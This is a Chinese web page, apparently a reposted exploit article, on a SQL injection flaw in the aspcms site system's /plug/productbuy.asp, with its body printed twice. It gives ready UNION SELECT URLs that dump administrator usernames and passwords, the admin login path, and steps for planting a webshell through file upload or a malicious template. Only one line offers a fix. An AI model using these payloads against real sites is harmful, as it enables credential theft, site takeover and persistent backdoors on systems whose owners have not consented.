您现在的位置是:网站首页> 编程资料编程资料
aspcms企业建站系统0day漏洞介绍_脚本攻防_网络安全_
2023-05-24
243人已围观
简介 aspcms企业建站系统0day漏洞介绍_脚本攻防_网络安全_
漏洞出现在
/plug/productbuy.asp
对接收的参数id没有进行过滤而导致的注入漏洞
注入后的页面有跳转,所以要快,建议用快捷键复制
爆用户名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4...........
爆密码
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
后台登录地址:/admin/login.asp
后台拿shell
1、直接上传.asp;x
2、系统配置信息
3、模版管理新建1.asp模板,内容写马的内容.
修复方法: id用cint(request("id"))
/plug/productbuy.asp
对接收的参数id没有进行过滤而导致的注入漏洞
注入后的页面有跳转,所以要快,建议用快捷键复制
爆用户名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4...........
爆密码
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
后台登录地址:/admin/login.asp
后台拿shell
1、直接上传.asp;x
2、系统配置信息
3、模版管理新建1.asp模板,内容写马的内容.
修复方法: id用cint(request("id"))
相关内容
- IPC$ 扫描和IPC$漏洞的防范小结_脚本攻防_网络安全_
- 常用的一些注入命令 方便一下大家_脚本攻防_网络安全_
- DEDECMS 爆严重安全漏洞 免账号密码直接进入后台_脚本攻防_网络安全_
- DedeCms V5.6 本地包含里的上传漏洞(可是那包含漏洞已经公布) _脚本攻防_网络安全_
- DEDECMS 5.6最新Get Shell漏洞 DEDECMS 5.3/5.6 _脚本攻防_网络安全_
- dedecms v5.6 GBK 注入漏洞利用(member/index.php)_脚本攻防_网络安全_
- DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞_脚本攻防_网络安全_
- 讯时漏洞一小结_脚本攻防_网络安全_
- 讯时系统(xuas)最新通杀漏洞0day图文说明_脚本攻防_网络安全_
- php版shell.users加管理员帐号的方法_脚本攻防_网络安全_